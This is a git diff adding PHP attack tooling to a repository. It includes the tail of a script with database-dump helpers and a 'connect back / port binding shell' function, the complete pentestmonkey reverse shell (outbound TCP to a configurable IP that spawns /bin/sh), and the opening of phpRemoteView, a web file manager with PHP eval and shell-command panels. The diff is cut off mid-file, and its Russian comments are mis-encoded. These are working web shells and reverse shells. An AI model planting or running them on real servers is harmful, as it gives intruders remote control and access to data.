+	$num_fields = mysql_num_fields($myresult);
+	$dataout .= "<tr border=1>\n";
+	for($i=0; $i<$num_fields; $i++) $dataout .= "<td>" . mysql_field_name($myresult, $i) . "</td>";
+	$dataout .= "</tr>\n";
+	while ($line = mysql_fetch_array($myresult, MYSQL_ASSOC)) {
+		$dataout .= "<tr>\n";
+		foreach($line as $colvalue) {
+			$dataout .= "<td>$colvalue</td>\n";
+		}
+	$dataout .= "</tr>\n";
+	}
+	$dataout .= "</table>\n";
+	return $dataout;
+}
+
+function dump_rows($myhost, $myuser, $mypass, $mydb, $mytable, $mydump) {
+	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
+	mysql_select_db($mydb); //  or return "Could not select database";
+	$query = "SELECT * FROM ".$mytable." INTO OUTFILE \"".$mydump."\";";
+	$result = mysql_query($query); // or return "Query failed: ".mysql_error();
+	mysql_free_result($result);
+	mysql_close($link);
+	return "Hopefully dumped!";
+}
+
+function dump_query($myhost, $myuser, $mypass, $mydb, $mysql, $mydump) {
+	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
+	mysql_select_db($mydb); //  or return "Could not select database";
+	$query = $mysql." INTO OUTFILE \"".$mydump."\";";
+	$result = mysql_query($query); // or return "Query failed: ".mysql_error();
+	mysql_free_result($result);
+	mysql_close($link);
+	return "Hopefully dumped!";
+}
+
+function display_query($myhost, $myuser, $mypass, $mydb, $mysql) {
+	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
+	mysql_select_db($mydb); //  or return "Could not select database";
+	$query = $mysql;
+	$result = mysql_query($query); // or return "Query failed: ".mysql_error();
+	$dataouted = prep_rows($result);
+	mysql_free_result($result);
+	mysql_close($link);
+	return($dataouted);
+}
+
+function display_rows($myhost, $myuser, $mypass, $mydb, $mytable) {
+	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
+	mysql_select_db($mydb); //  or return "Could not select database";
+	$query = "SELECT * FROM ".$mytable;
+	$result = mysql_query($query); // or return "Query failed: ".mysql_error();
+	$dataouted = prep_rows($result);
+	mysql_free_result($result);
+	mysql_close($link);
+	return($dataouted);
+}
+
+function display_tables($myhost, $myuser, $mypass, $mydb) {
+	global $MyLoc,$SREQ;
+	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
+	$result = mysql_list_tables($mydb);
+	if (!$result) {
+		return "DB Error, could not list tables";
+	}
+	$dataout = "<table>\n";
+	while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
+		$dataout .= "<tr>\n";
+		foreach ($line as $col_value) {
+			$dataout .= "<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incdbpass=$mypass&incdbname=$mydb&incdbtable=$col_value'>$col_value</a></td>\n";
+		}
+	$dataout .= "</tr>\n";
+	}
+	$dataout .= "</table>\n";
+	mysql_free_result($result);
+	mysql_close($link);
+	return($dataout);
+}
+
+function display_dbs($myhost, $myuser, $mypass) {
+	global $MyLoc,$SREQ;
+	$link = mysql_connect($myhost, $myuser, $mypass);
+	$result = mysql_list_dbs($link);
+	if (!$result) {
+		return "DB Error, could not list databases";
+	}
+	$dataout = "<table>\n";
+	while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
+		$dataout .= "<tr>\n";
+		foreach ($line as $col_value) {
+			$dataout .= "<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incdbpass=$mypass&incdbname=$col_value'>$col_value</a></td>\n";
+		}
+	$dataout .= "</tr>\n";
+	}
+	$dataout .= "</table>\n";
+	mysql_free_result($result);
+	mysql_close($link);
+	return($dataout);
+}
+
+function Odisplay_rows($myhost, $myuser, $mypass, $mydb, $mytable) {
+	$link = odbc_connect($myhost, $myuser, $mypass); // or return "Could not connect";
+	$query = "SELECT * FROM ".$mytable;
+	$result = odbc_exec($link, $query); // or return "Query failed: ".mysql_error();
+	$dataout = "<table>\n";
+	while ($line = odbc_fetch_row($result, MYSQL_ASSOC)) {
+		$dataout = $dataout . "<tr>\n";
+		foreach($line as $colvalue) {
+			$dataout = $dataout . "<td>$colvalue</td>\n";
+		}
+	$dataout = $dataout . "</tr>\n";
+	}
+	$dataout = $dataout . "</table>\n";
+	return($dataout);
+}
+
+function Odisplay_tables($myhost, $myuser, $mypass) {
+	$link = odbc_connect($myhost, $myuser, $mypass); // or return "Could not connect";
+	$result = odbc_tables($link);
+	if (!$result) {
+		return "DB Error, could not list tables";
+	}
+	$dataout = "<table>\n";
+	while ($line = odbc_fetch_row($result, MYSQL_ASSOC)) {
+		if(odbc_result($line, 4) == "TABLE") {
+			$dataout = $dataout . "<tr>\n";
+			$dataout = $dataout . "<td>" . odbc_result($tablelist, 3) ."</td>\n"; 
+		}
+		$dataout = $dataout . "</tr>\n";
+	}
+	$dataout = $dataout . "</table>\n";
+	return($dataout);
+}
+
+######################################################################
+# Dan's Network function Wrappers
+# Initial use inside this script, need to handle the error data 
+# differently to get it included in the base 64 output!
+######################################################################
+
+function DB_NET_GET_SOCKET_PROTOCOL($prot) {
+	switch($prot) {
+		case "udp":
+			$protocol = SOL_UDP;
+			$socktype = SOCK_DGRAM;
+		break;
+		case "tcp":
+		default:
+			$protocol = SOL_TCP;
+			$socktype = SOCK_STREAM;
+		break;
+	}
+	return(array($protocol, $socktype));
+}
+
+function DB_NET_CONNECT($hostname, $port=80, $prot="tcp") {
+	$address = gethostbyname($hostname);
+	list($protocol, $socktype) = DB_NET_GET_SOCKET_PROTOCOL($prot);
+	switch($prot) {
+		case "udp":
+			$protocol = SOL_UDP;
+			$socktype = SOCK_DGRAM;
+		break;
+		case "tcp":
+		default:
+			$protocol = SOL_TCP;
+			$socktype = SOCK_STREAM;
+		break;
+	}
+	$socket = socket_create(AF_INET, $socktype, $protocol);
+	if ($socket < 0) {
+		echo "socket_create() failed: reason: " . socket_strerror($socket) . "\n";
+	}
+
+	$result = socket_connect($socket, $address, $port);
+	if ($result < 0) {
+		echo "socket_connect() failed.\nReason: ($result) " . socket_strerror($result) . "\n";
+	}
+	return $socket;
+}
+
+function DB_NET_LISTEN($address, $port) {
+	if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) {
+		echo "socket_create() failed: reason: " . socket_strerror($sock) . "\n";
+		return(-1);
+	}
+
+	if (($ret = socket_bind($sock, $address, $port)) < 0) {
+		echo "socket_bind() failed: reason: " . socket_strerror($ret) . "\n";
+		return(-2);
+	}
+
+	if (($ret = socket_listen($sock, 5)) < 0) {
+		echo "socket_listen() failed: reason: " . socket_strerror($ret) . "\n";
+		return(-3);
+	}
+
+	return($sock);
+}
+
+######################################################################
+# Dan's PHP Connect Back / Port Binding Shell!
+# Yes that right a REAL shell!
+# Now I had this idea for ages, finally coded it 6 months ago, and 
+# it's never really been used.
+# Not really brain science but when there are many examples of PHP 
+# sockets + proc_open it's a little harder.
+######################################################################
+
+function DB_Shell($type, $shell, $port, $host = "0.0.0.0") {
+	if($type == "cb" && $host != "0.0.0.0") {
+		$procsock = DB_NET_CONNECT($host, $port, "tcp");
+	} elseif ($type == "pb") {
+		$lsock = DB_NET_LISTEN($host, $port);
+		if (($procsock = socket_accept($lsock)) < 0) {
+    		return "socket_accept() failed: reason: " . socket_strerror($procsock) . "\n";
+    	}
+	} else {
+		return "Error no connection details specified!";
+	}
+
+	set_time_limit(9000);
+	$descriptorspec = array(
+		0 => array("pipe", "r"),
+		1 => array("pipe", "w"),
+		2 => array("pipe", "w")
+	);
+	$process = proc_open($shell, $descriptorspec, $pipes);
+	if (is_resource($process)) {
+		$tmp_loop = 1;
+		do {
+			$tmp_array = array($procsock);
+			$num_changed_sockets = socket_select($tmp_array, $write = NULL, $except = NULL, 0);
+			if ($num_changed_sockets === false) {
+				$tmp_loop = 0;
+			} else if ($num_changed_sockets > 0) {
+				foreach($tmp_array as $k => $v) {
+					if($v == $procsock) {
+						if(socket_last_error($procsock) > 0) $tmp_loop = 0;
+						if($tmp_loop == 1 && false == ($buf = socket_read($procsock, 2048, PHP_NORMAL_READ))) $tmp_loop = 0;
+						fwrite($pipes[0], $buf);
+					}
+				}
+			}
+			$tmp_arrayS = array($pipes[1], $pipes[2]);
+			$num_changed_streams = stream_select($tmp_arrayS, $write = NULL, $except = NULL, 0);
+			if ($num_changed_streams === FALSE) {
+				$tmp_loop = 0;
+			} else if ($num_changed_streams > 0) {
+				foreach($tmp_arrayS as $k => $v) {
+					if($tmp_loop == 1 && false == ($buf = fread($v, 2048))) $tmp_loop = 0;
+					socket_write($procsock, $buf, strlen($buf));
+				}
+			}
+		} while($tmp_loop == 1);
+	} else {
+		return "Error executing shell " . $shell;
+	}
+}
+
+?>
diff --git a/php/php-reverse-shell.php b/php/php-reverse-shell.php
new file mode 100755
index 0000000..2503b71
--- /dev/null
+++ b/php/php-reverse-shell.php
@@ -0,0 +1,192 @@
+<?php
+// php-reverse-shell - A Reverse Shell implementation in PHP
+// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
+//
+// This tool may be used for legal purposes only.  Users take full responsibility
+// for any actions performed using this tool.  The author accepts no liability
+// for damage caused by this tool.  If these terms are not acceptable to you, then
+// do not use this tool.
+//
+// In all other respects the GPL version 2 applies:
+//
+// This program is free software; you can redistribute it and/or modify
+// it under the terms of the GNU General Public License version 2 as
+// published by the Free Software Foundation.
+//
+// This program is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License along
+// with this program; if not, write to the Free Software Foundation, Inc.,
+// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
+//
+// This tool may be used for legal purposes only.  Users take full responsibility
+// for any actions performed using this tool.  If these terms are not acceptable to
+// you, then do not use this tool.
+//
+// You are encouraged to send comments, improvements or suggestions to
+// me at pentestmonkey@pentestmonkey.net
+//
+// Description
+// -----------
+// This script will make an outbound TCP connection to a hardcoded IP and port.
+// The recipient will be given a shell running as the current user (apache normally).
+//
+// Limitations
+// -----------
+// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
+// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
+// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
+//
+// Usage
+// -----
+// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
+
+set_time_limit (0);
+$VERSION = "1.0";
+$ip = '127.0.0.1';  // CHANGE THIS
+$port = 1234;       // CHANGE THIS
+$chunk_size = 1400;
+$write_a = null;
+$error_a = null;
+$shell = 'uname -a; w; id; /bin/sh -i';
+$daemon = 0;
+$debug = 0;
+
+//
+// Daemonise ourself if possible to avoid zombies later
+//
+
+// pcntl_fork is hardly ever available, but will allow us to daemonise
+// our php process and avoid zombies.  Worth a try...
+if (function_exists('pcntl_fork')) {
+	// Fork and have the parent process exit
+	$pid = pcntl_fork();
+	
+	if ($pid == -1) {
+		printit("ERROR: Can't fork");
+		exit(1);
+	}
+	
+	if ($pid) {
+		exit(0);  // Parent exits
+	}
+
+	// Make the current process a session leader
+	// Will only succeed if we forked
+	if (posix_setsid() == -1) {
+		printit("Error: Can't setsid()");
+		exit(1);
+	}
+
+	$daemon = 1;
+} else {
+	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
+}
+
+// Change to a safe directory
+chdir("/");
+
+// Remove any umask we inherited
+umask(0);
+
+//
+// Do the reverse shell...
+//
+
+// Open reverse connection
+$sock = fsockopen($ip, $port, $errno, $errstr, 30);
+if (!$sock) {
+	printit("$errstr ($errno)");
+	exit(1);
+}
+
+// Spawn shell process
+$descriptorspec = array(
+   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
+   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
+   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
+);
+
+$process = proc_open($shell, $descriptorspec, $pipes);
+
+if (!is_resource($process)) {
+	printit("ERROR: Can't spawn shell");
+	exit(1);
+}
+
+// Set everything to non-blocking
+// Reason: Occsionally reads will block, even though stream_select tells us they won't
+stream_set_blocking($pipes[0], 0);
+stream_set_blocking($pipes[1], 0);
+stream_set_blocking($pipes[2], 0);
+stream_set_blocking($sock, 0);
+
+printit("Successfully opened reverse shell to $ip:$port");
+
+while (1) {
+	// Check for end of TCP connection
+	if (feof($sock)) {
+		printit("ERROR: Shell connection terminated");
+		break;
+	}
+
+	// Check for end of STDOUT
+	if (feof($pipes[1])) {
+		printit("ERROR: Shell process terminated");
+		break;
+	}
+
+	// Wait until a command is end down $sock, or some
+	// command output is available on STDOUT or STDERR
+	$read_a = array($sock, $pipes[1], $pipes[2]);
+	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
+
+	// If we can read from the TCP socket, send
+	// data to process's STDIN
+	if (in_array($sock, $read_a)) {
+		if ($debug) printit("SOCK READ");
+		$input = fread($sock, $chunk_size);
+		if ($debug) printit("SOCK: $input");
+		fwrite($pipes[0], $input);
+	}
+
+	// If we can read from the process's STDOUT
+	// send data down tcp connection
+	if (in_array($pipes[1], $read_a)) {
+		if ($debug) printit("STDOUT READ");
+		$input = fread($pipes[1], $chunk_size);
+		if ($debug) printit("STDOUT: $input");
+		fwrite($sock, $input);
+	}
+
+	// If we can read from the process's STDERR
+	// send data down tcp connection
+	if (in_array($pipes[2], $read_a)) {
+		if ($debug) printit("STDERR READ");
+		$input = fread($pipes[2], $chunk_size);
+		if ($debug) printit("STDERR: $input");
+		fwrite($sock, $input);
+	}
+}
+
+fclose($sock);
+fclose($pipes[0]);
+fclose($pipes[1]);
+fclose($pipes[2]);
+proc_close($process);
+
+// Like print, but does nothing if we've daemonised ourself
+// (I can't figure out how to redirect STDOUT like a proper daemon)
+function printit ($string) {
+	if (!$daemon) {
+		print "$string\n";
+	}
+}
+
+?> 
+
+
+
diff --git a/php/phpRemoteView.php b/php/phpRemoteView.php
new file mode 100644
index 0000000..352d00a
--- /dev/null
+++ b/php/phpRemoteView.php
@@ -0,0 +1,2553 @@
+<?php
+
+/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
+ *
+ *  Welcome to phpRemoteView (RemView) 
+ *
+ *  View/Edit remove file system:
+ *  - view index of directory (/var/log - view logs, /tmp - view PHP sessions)
+ *  - view name, size, owner:group, perms, modify time of files
+ *  - view html/txt/image/session files
+ *  - download any file and open on Notepad
+ *  - create/edit/delete file/dirs
+ *  - executing any shell commands and any PHP-code
+ *
+ *  Free download from http://php.spb.ru/remview/
+ *  Version 04c, 2003-10-23. 
+ *  Please, report bugs...
+ *
+ *  This programm for Unix/Windows system and PHP4 (or higest).
+ *
+ *  (c) Dmitry Borodin, dima@php.spb.ru, http://php.spb.ru
+ *
+ * * * * * * * * * * * * * * * * * WHATS NEW * * * * * * * * * * * * * * * *
+ *
+ * --version4--
+ *  2003.10.23 support short <?php ?> tags, thanks A.Voropay
+ *
+ *  2003.04.22 read first 64Kb of null-size file (example: /etc/zero), 
+ *                thanks Anight
+ *             add many functions/converts: md5, decode md5 (pass crack), 
+ *                date/time, base64, translit, russian charsets
+ *             fix bug: read session files
+ *
+ *  2002.08.24 new design and images
+ *             many colums in panel
+ *             sort & setup panel
+ *             dir tree
+ *             base64 encoding
+ *             character map
+ *             HTTP authentication with login/pass
+ *             IP-address authentication with allow hosts
+ *
+ * --version3--
+ *  2002.08.10 add multi language support (english and russian)
+ *             some update
+ *
+ *  2002.08.05 new: full windows support
+ *             fix some bugs, thanks Jeremy Flinston
+ * 
+ *  2002.07.31 add file upload for create files
+ *             add 'direcrory commands'
+ *             view full info after safe_mode errors
+ *             fixed problem with register_glogals=off in php.ini
+ *             fixed problem with magic quotes in php.ini (auto strip slashes)
+ *
+ * --version2--
+ *  2002.01.20 add panel 'TOOLS': eval php-code and run shell commands
+ *             add panel 'TOOLS': eval php-code and run shell commands
+ *             add copy/edit/create file (+panel 'EDIT')
+ *             add only-read mode (disable write/delete and PHP/Shell)
+ *
+ *  2002.01.19 add delete/touch/clean/wipe file
+ *             add panel 'INFO', view a/c/m-time, hexdump view
+ *             add session file view mode (link 'SESSION').
+ *
+ *  2002.01.12 first version!
+ *
+ * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
+
+///////////////////////////////// S E T U P ///////////////////////////////////
+
+   
+   $version="2003-10-23";
+
+   $hexdump_lines=8;        // lines in hex preview file
+   $hexdump_rows=24;        // 16, 24 or 32 bytes in one line
+
+   $mkdir_mode=0755;        // chmode for new dir ('MkDir' button)
+
+   $maxsize_fread=65536;    // read first 64Kb from any null-size file
+
+   // USER ACCESS //
+
+   $write_access=true;      // true - user (you) may be write/delete files/dirs
+                            // false - only read access
+
+   $phpeval_access=true;    // true - user (you) may be execute any php-code
+                            // false - function eval() disable
+   
+   $system_access=true;     // true - user (you) may be run shell commands
+                            // false - function system() disable
+   
+   // AUTHORIZATION //
+
+   $login=false;            // Login & password for access to this programm.
+   $pass=false;             // Example: $login="MyLogin"; $pass="MyPaSsWoRd";
+                            // Type 'login=false' for disable authorization.
+
+   $host_allow=array("*");  // Type list of your(allow) hosts. All other - denied.
+                            // Example: $host_allow=array("127.0.0.*","localhost")
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+   $tmp=array();
+   foreach ($host_allow as $k=>$v)
+      $tmp[]=str_replace("\\*",".*",preg_quote($v));
+   $s="!^(".implode("|",$tmp).")$!i";
+   if (!preg_match($s,getenv("REMOTE_ADDR")) && !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) 
+      exit("<h1><a href=http://php.spb.ru/remview/>phpRemoteView</a>: Access Denied - your host not allow</h1>\n");
+   if ($login!==false && (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || 
+      $HTTP_SERVER_VARS['PHP_AUTH_USER']!=$login || $HTTP_SERVER_VARS['PHP_AUTH_PW']!=$pass)) {
+      header("WWW-Authenticate: Basic realm=\"phpRemoteView\"");
+      header("HTTP/1.0 401 Unauthorized");
+      exit("<h1><a href=http://php.spb.ru/remview/>phpRemoteView</a>: Access Denied - password erroneous</h1>\n");
+   }
+
+   error_reporting(2047);
+   set_magic_quotes_runtime(0);
+   @set_time_limit(0);
+   @ini_set('max_execution_time',0);
+   @ini_set('output_buffering',0);
+   if (function_exists("ob_start") && (!isset($c) || $c!="md5crack")) ob_start("ob_gzhandler");
+
+   $self=basename($HTTP_SERVER_VARS['PHP_SELF']);
+
+   $url="http://".getenv('HTTP_HOST').
+        (getenv('SERVER_PORT')!=80 ? ":".getenv('SERVER_PORT') : "").
+        $HTTP_SERVER_VARS['PHP_SELF'].
+        (getenv('QUERY_STRING')!="" ? "?".getenv('QUERY_STRING') : "");
+   $uurl=urlencode($url);
+
+   //
+   // antofix 'register globals': $HTTP_GET/POST_VARS -> normal vars;
+   //
+   $autovars1="c d f php skipphp pre nlbr xmp htmls shell skipshell pos ".
+              "ftype fnot c2 confirm text df df2 df3 df4 ref from to ".
+              "fatt showfile showsize root name ref names sort sortby ".
+              "datetime fontname fontname2 fontsize pan limit convert fulltime fullqty";
+   foreach (explode(" ",$autovars1) as $k=>$v)  {
+      if (isset($HTTP_POST_VARS[$v])) $$v=$HTTP_POST_VARS[$v];
+         elseif (isset($HTTP_GET_VARS[$v])) $$v=$HTTP_GET_VARS[$v];
+            //elseif (isset($HTTP_COOKIE_VARS[$v])) $$v=$HTTP_COOKIE_VARS[$v];
+   }
+
+   //
+   // autofix 'magic quotes':
+   //
+   $autovars2="php shell text d root convert";
+   if (get_magic_quotes_runtime() || get_magic_quotes_gpc()) {
+      foreach (explode(" ",$autovars2) as $k=>$v) {
+         if (isset($$v)) $$v=stripslashes($$v);
+      }
+   }
+
+   $cp_def=array(
+      "001001",
+      "nst2ac",
+      "d/m/y H:i",
+      "Tahoma",
+      "9"
+      );
+
+   $panel=0;
+   if (isset($HTTP_COOKIE_VARS["cp$panel"])) 
+      $cp=explode("~",$HTTP_COOKIE_VARS["cp$panel"]); 
+   else 
+      $cp=$cp_def;
+   $cc=$cp[0];
+   $cn=$cp[1];
+
+/*
+
+$cc / $cp[0]- ñïèñîê îäíîáóêâåííûõ ïàğàìåòğîâ, ñêîïèğîâàíî â $cs:
+   $cc[0] - ïî êàêîé êîëîíêå ñîğòèğîâàòü, à åñëè ıòî íå öèôğà:
+               n - ïî èìåíè
+               e - ğàñøèğåíèå
+   $cc[1] - ïîğÿäîê (0 - âîçğàñò. 1 - óáûâàşùèé)
+   $cc[2] - ïîêàçûâàòü ëè èêîíêè
+   $cc[3] - ÷òî äåëàòü ïğè êëèêå ïî èêîíêå ôàéëà:
+               0 - ïğîñìîòğ â text/plain
+               1 - ïğîñìîòğ â html
+               2 - download
+               3 - ïàğàìåòğû ôàéëà (info)
+   $cc[4] - îêğóãëÿòü ğàçìåğ ôàéëîâ äî Êá/Ìá/Ãá
+   $cc[5] - ÿçûê:
+               1 - àíãëèéñêèé
+               2 - ğóññêè
+
+$cn / $cp[1] - ñïèñîê êîëîíîê è èõ ïîğÿäîê, êîòîğûå ïîêàçûâàòü, ñòğîêà áóêâ/öèôğ:
+   t - type
+   n - name
+   s - size
+   a - owner+group
+   o - owner
+   g - group
+   c - chmod
+   1 - create time
+   2 - modify time
+   3 - access time
+
+$cp[2]: ôîğìàò âğåìåíè
+
+$cp[3]: èìÿ øğèôòà
+
+$cp[4]: ğàçìåğ øğèôòà
+
+*/
+
+   // Êàê âûğàâíèâàòü êîëîíêè
+   $cn_align=array();
+   $cn_align['t']='center';
+   $cn_align['n']='left';
+   $cn_align['s']='right';
+   $cn_align['a']='center';
+   $cn_align['o']='center';
+   $cn_align['g']='center';
+   $cn_align['c']='center';
+   $cn_align['1']='center';
+   $cn_align['2']='center';
+   $cn_align['3']='center';
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+/*--mmstart--*/
+$mm=array(
+"Index of"=>"Èíäåêñ",
+"View file"=>"Ïîêàç ôàéëà",
+"DISK"=>"ÄÈÑÊ",
+"Info"=>"Èíôî",
+"Plain"=>"Ïğÿìîé",
+"HTML"=>"HTML",
+"Session"=>"Ñåññèÿ",
+"Image"=>"Êàğòèíêà",
+"Notepad"=>"Áëîêíîò",
+"DOWNLOAD"=>"ÇÀÃĞÓÇÈÒÜ",
+"Edit"=>"Ïğàâêà",
+"Sorry, this programm run in read-only mode."=>"Èçâèíèòå, ıòà ïğîãğàììà ğàáîòàåò â ğåæèìå 'òîëüêî ÷òåíèå'.",
+"For full access: write"=>"Äëÿ ïîëíîãî äîñòóïà: íàïèøèòå",
+"in this php-file"=>"â ıòîì php-ôàéëå",
+"Reason"=>"Ïğè÷èíà",
+"Error path"=>"Îøèáî÷íûé ïóòü",
+"Click here for start"=>"Íàæìèòå äëÿ ñòàğòà",
+"up directory"=>"êàòàëîã âûøå",
+"access denied"=>"äîñòóï çàïğåùåí",
+"REMVIEW TOOLS"=>"ÓÒÈËÈÒÛ REMVIEW",
+"version"=>"âåğñèÿ",
+"Free download"=>"Áåñïëàòíàÿ çàãğóçêà",
+"back to directory"=>"âåğíóòüñÿ â êàòàëîã",
+"Size"=>"Ğàçìåğ",
+"Owner"=>"Îâíåğ",
+"Group"=>"Ãğóïïà",
+"FileType"=>"Òèï ôàéëà",
+"Perms"=>"Ïğàâà",
+"Create time"=>"Âğåìÿ ñîçäàíèÿ",
+"Access time"=>"Âğåìÿ äîñòóïà",
+"MODIFY time"=>"Âğåìÿ ÈÇÌÅÍÅÍÈß",
+"HEXDUMP PREVIEW"=>"ÏĞÅÄÏĞÎÑÌÎÒĞ Â 16-ĞÈ×ÍÎÌ ÂÈÄÅ",
+"ONLY READ ACCESS"=>"ÄÎÑÒÓÏ ÒÎËÜÊÎ ÍÀ ×ÒÅÍÈÅ",
+"Can't READ file - access denied"=>"Íå ìîãó ïğî÷èòàòü - äîñòóï çàïğåùåí",
+"full read/write access"=>"ïîëíûé äîñòóï íà ÷òåíèå/çàïèñü",
+"FILE SYSTEM COMMANDS"=>"ÊÎÌÀÍÄÛ ÔÀÉËÎÂÎÉ ÑÈÑÒÅÌÛ",
+"EDIT"=>"ĞÅÄÀÊÒ.",
+"FILE"=>"ÔÀÉË",
+"DELETE"=>"ÑÒÅĞÅÒÜ",
+"Delete this file"=>"Ñòåğåòü ôàéë",
+"CLEAN"=>"Î×ÈÑÒÈÒÜ",
+"TOUCH"=>"ÎÁÍÎÂÈÒÜ",
+"Set current 'mtime'"=>"Óñòàí.òåêóù.âğåìÿ",
+"WIPE(delete)"=>"ÓÍÈ×ÒÎÆÈÒÜ",
+"Write '0000..' and delete"=>"Çàáèòü íóëÿìè, ñòåğåòü",
+"COPY FILE"=>"ÊÎÏÈĞÎÂÀÒÜ ÔÀÉË",
+"COPY"=>"ÊÎÏÈĞÎÂÀÒÜ",
+"MAKE DIR"=>"ÑÎÇÄÀÒÜ ÊÀÒÀËÎÃ",
+"type full path"=>"ââåäèòå ïîëíûé ïóòü",
+"MkDir"=>"Ñîçä.Êàò.",
+"CREATE NEW FILE or override old file"=>"ÑÎÇÄÀÒÜ ÍÎÂÛÉ ÔÀÉË èëè ïåğåçàïèñàòü ñòàğûé",
+"CREATE/OVERRIDE"=>"ÑÎÇÄÀÒÜ/ÏÅĞÅÇÀÏÈÑÀÒÜ",
+"select file on your local computer"=>"âûáğàòü ôàéë íà âàøåì ëîêàëüíîì êîìïüşòåğå",
+"save this file on path"=>"ñîõğàíèòü ıòîò ôàéë â êàòàëîã",
+"create file name automatic"=>"ïğèäóìàòü èìÿ ôàéëó àâòîìàòè÷åñêè",
+"OR"=>"ÈËÈ",
+"type any file name"=>"ââåñòè èìÿ ôàéëà âğó÷íóş",
+"convert file name to lovercase"=>"êîíâåğòèğîâàòü èìÿ â íèæíèé ğåãèñòğ",
+"Send File"=>"Ïîñëàòü ôàéë",
+"Delete all files in dir"=>"Óäàëèòü âñå ôàéëû",
+"Delete all dir/files recursive"=>"Óäàëèòü ÂÑÅ +ïîäêàòàëîãè ğåêóğñèâíî",
+"Confirm not found (go back and set checkbox)"=>"Ïîäòâåğæäåíèå íå ïîñòàâëåíî (âåğíèòåñü íàçàä è ïîñòàâüòå ãàëî÷êó)",
+"Delete cancel - File not found"=>"Óäàëåíèå îòìåíåíî - Ôàéë íå íàéäåí",
+"YES"=>"ÄÀ",
+"ME"=>"ÌÅÍß",
+"NO (back)"=>"ÍÅÒ (íàçàä)",
+"Delete cancel"=>"Óäàëåíèå îòìåíåíî",
+"ACCESS DENIED"=>"ÄÎÑÒÓÏ ÇÀÏĞÅÙÅÍ",
+"done (go back)"=>"ãîòîâî (íàçàä)",
+"Delete ok"=>"Îê, óäàëåííî",
+"Touch cancel"=>"Îáíîâëåíèå îòìåíåíî",
+"Touch ok (set current time to 'modify time')"=>"Îáíîâëåíèå çàâåğøåíî (ôàéëó ïğèñâîåíî òåêóùåå âğåìÿ ìîäèôèêàöèè)",
+"Clean (empty file) cancel"=>"Î÷èùåíèå (îáíóëåíèå ôàéëà) îòìåíåíî",
+"Clean ok (file now empty)"=>"Îê, î÷èùåíî (ôàéë îáíóëåí)",
+"Wipe cancel - access denied"=>"Óíè÷òîæåíèå îòìåíåíî - äîñòóï çàïğåùåí",
+"Wipe ok (file deleted)"=>"Îê, óíè÷òîæåíî (è ôàéë ñòåğò)",
+"DIR"=>"DIR",
+"Deleting all files in"=>"Óäàëåíèå âñåõ ôàéëîâ â",
+"skip"=>"ïğîïóñê",
+"deleting"=>"óäàëåíèå",
+"Deleting all dir/files (recursive) in"=>"Óäàëåíèå âñåõ ôàéëîâ/ïîäêàòàëîãîâ (ğåêóğñèâíî)",
+"DONE, go back"=>"ÃÎÒÎÂÎ, íàçàä",
+"DONE"=>"ÃÎÒÎÂÎ",
+"file not found"=>"ôàéë íå íàéäåí",
+"ONLY READ ACCESS (don't edit!)"=>"ÄÎÑÒÓÏ ÒÎËÜÊÎ ÍÀ ×ÒÅÍÈÅ (íå ğåäàêòèğîâàòü)",
+"Can't READ file - access denied (don't edit!)"=>"Íå ìîãó ×ÈÒÀÒÜ ôàéë - äîñòóï çàïğåùåí",
+"EDIT FILE"=>"ÏĞÀÂÈÒÜ ÔÀÉË",
+"can't open, access denied"=>"íå ìîãó îòêğûòü, äîñòóï çàïğåùåí",
+"SAVE FILE (write to disk)"=>"ÑÎÕĞÀÍÈÒÜ ÔÀÉË (çàïèñü íà äèñê)",
+"You mast checked 'create file name automatic' OR typed file name!"=>"Âû äîëæíû îòìåòèòü ãàëî÷êó [ñîçäàòü ôàéë àâòîìàòè÷åñêè] èëè ââåñòè â ïîëå èìÿ ôàéëà!'",
+"SAVING TO"=>"ÑÎÕĞÀÍÈÒÜ Â",
+"Sorry, access denied"=>"Èçâèíèòå, äîñòóï çàïğåùåí",
+"for example, uncomment next line"=>"äëÿ ïğèìåğà, ğàñêîììåíòèğóéòå ñëåäóşùóş ñòğîêó",
+"Eval PHP code"=>"Âûïîëíèòü PHP êîä",
+"don't type"=>"íå ïèøèòå",
+"and"=>"è",
+"example (remove comments '#')"=>"ïğèìåğ (óäàëèòå êîììåíòàğèè '#')",
+"Shell commands"=>"Êîìàíäû Shell'a",
+"filesize to 0byte"=>"ğàçìåğ â 0 áàéò",
+"from"=>"îò",
+"to"=>"â",
+"Full file name"=>"Ïîëíîå èìÿ ôàéëà",
+"Can't open directory"=>"Íå ìîãó îòêğûòü êàòàëîã",
+"setup"=>"íàñòğîéêà",
+"back"=>"íàçàä",
+"Reset all settings"=>"Ñáğîñèòü âñå íàñòğîéêè",
+"clear"=>"î÷èñòèòü",
+"Current"=>"Òåêóùèå",
+"Colums and sort"=>"Êîëîíêè è ñîğòèğîâêà",
